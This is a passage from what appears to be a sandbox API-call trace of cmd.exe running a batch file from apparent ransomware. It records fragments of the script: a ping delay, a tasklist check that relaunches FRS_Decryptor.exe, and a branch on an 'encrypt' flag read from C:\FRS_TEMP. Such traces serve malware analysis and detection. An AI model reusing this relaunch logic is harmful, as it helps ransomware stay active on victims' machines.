lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0109.761] SetErrorMode (uMode=0x0) returned 0x1 [0109.761] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.761] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0109.761] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.761] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.761] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0109.761] GetLastError () returned 0x2 [0109.761] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.761] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ab0 [0109.761] FindClose (in: hFindFile=0xd59ab0 | out: hFindFile=0xd59ab0) returned 1 [0109.761] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0109.761] GetLastError () returned 0x2 [0109.762] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59bb0 [0109.762] FindClose (in: hFindFile=0xd59bb0 | out: hFindFile=0xd59bb0) returned 1 [0109.762] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0109.762] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0109.762] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0109.762] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0109.762] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0109.763] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0109.763] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0109.763] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0109.763] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0109.763] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0109.763] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0109.763] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0109.763] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0109.763] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0109.763] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0109.763] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0109.763] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x24c, dwProcessId=0x4e8, dwThreadId=0x5a0)) returned 1 [0109.765] CloseHandle (hObject=0x24c) returned 1 [0109.765] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0109.765] GetEnvironmentStringsW () returned 0xd30508* [0109.765] FreeEnvironmentStringsA (penv="=") returned 1 [0109.765] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0111.829] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0111.830] CloseHandle (hObject=0x36c) returned 1 [0111.830] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0111.830] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0111.830] GetEnvironmentStringsW () returned 0xd7e510* [0111.830] FreeEnvironmentStringsA (penv="=") returned 1 [0111.830] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0111.830] GetEnvironmentStringsW () returned 0xd30508* [0111.830] FreeEnvironmentStringsA (penv="=") returned 1 [0111.830] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0111.830] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0111.830] _close (_FileHandle=3) returned 0 [0111.830] _get_osfhandle (_FileHandle=1) returned 0x28 [0111.830] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0111.830] _get_osfhandle (_FileHandle=1) returned 0x28 [0111.830] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0111.830] _get_osfhandle (_FileHandle=0) returned 0x24 [0111.830] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0111.831] SetConsoleInputExeNameW () returned 0x1 [0111.831] GetConsoleOutputCP () returned 0x1b5 [0111.831] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0111.831] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.831] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0111.831] _open_osfhandle (_OSFileHandle=0x260, _Flags=8) returned 3 [0111.831] _get_osfhandle (_FileHandle=3) returned 0x260 [0111.831] SetFilePointer (in: hFile=0x260, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0111.831] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0111.831] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0111.831] SetFilePointer (in: hFile=0x260, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0111.831] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0111.831] GetFileType (hFile=0x260) returned 0x1 [0111.831] _get_osfhandle (_FileHandle=3) returned 0x260 [0111.831] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0111.831] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0111.832] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0111.832] SetFilePointer (in: hFile=0x260, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0111.832] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0111.832] GetFileType (hFile=0x260) returned 0x1 [0111.832] _get_osfhandle (_FileHandle=3) returned 0x260 [0111.832] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0111.832] _tell (_FileHandle=3) returned 2627 [0111.832] _close (_FileHandle=3) returned 0 [0111.832] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0111.832] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0111.832] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0111.832] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0111.832] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0111.836] feof (_File=0x76ea4c68) returned 0 [0111.836] ferror (_File=0x76ea4c68) returned 0 [0111.836] fgets (in: _Buf=0xd82830, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0112.296] feof (_File=0x76ea4c68) returned 0 [0112.296] ferror (_File=0x76ea4c68) returned 0 [0112.296] fgets (in: _Buf=0xd8792e, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0112.333] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0112.333] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43726, cbMultiByte=78, lpWideCharStr=0xd436d8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0112.334] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0112.334] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0112.334] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0112.334] _open_osfhandle (_OSFileHandle=0x2b8, _Flags=8) returned 3 [0112.334] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.334] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0112.334] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.334] GetFileSize (in: hFile=0x2b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0112.334] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0112.334] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.334] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0112.334] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.334] GetFileType (hFile=0x2b8) returned 0x1 [0112.334] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0112.334] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0112.335] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0112.335] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0112.335] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0112.335] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.335] GetFileType (hFile=0x2b8) returned 0x1 [0112.335] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0112.335] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0112.335] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0112.335] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0112.335] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.335] GetFileType (hFile=0x2b8) returned 0x1 [0112.335] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0112.335] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0112.335] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.335] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.335] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.335] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.335] GetFileType (hFile=0x2b8) returned 0x1 [0112.335] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.335] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.335] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0112.335] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0112.335] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0112.335] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.335] GetFileType (hFile=0x2b8) returned 0x1 [0112.335] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0112.335] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.335] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0112.335] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0112.335] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0112.335] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.336] GetFileType (hFile=0x2b8) returned 0x1 [0112.336] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0112.336] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.336] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0112.336] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0112.336] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0112.336] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.336] GetFileType (hFile=0x2b8) returned 0x1 [0112.336] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0112.336] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.336] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0112.336] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0112.336] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0112.336] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.336] GetFileType (hFile=0x2b8) returned 0x1 [0112.336] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0112.336] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.336] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0112.336] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0112.336] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0112.336] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.336] GetFileType (hFile=0x2b8) returned 0x1 [0112.336] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0112.336] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.336] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0112.336] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0112.336] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0112.336] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0112.336] GetFileType (hFile=0x2b8) returned 0x1 [0112.336] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0112.337] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0112.337] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0112.337] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0112.337] SetFilePointer (in: hFile=0x2b8, 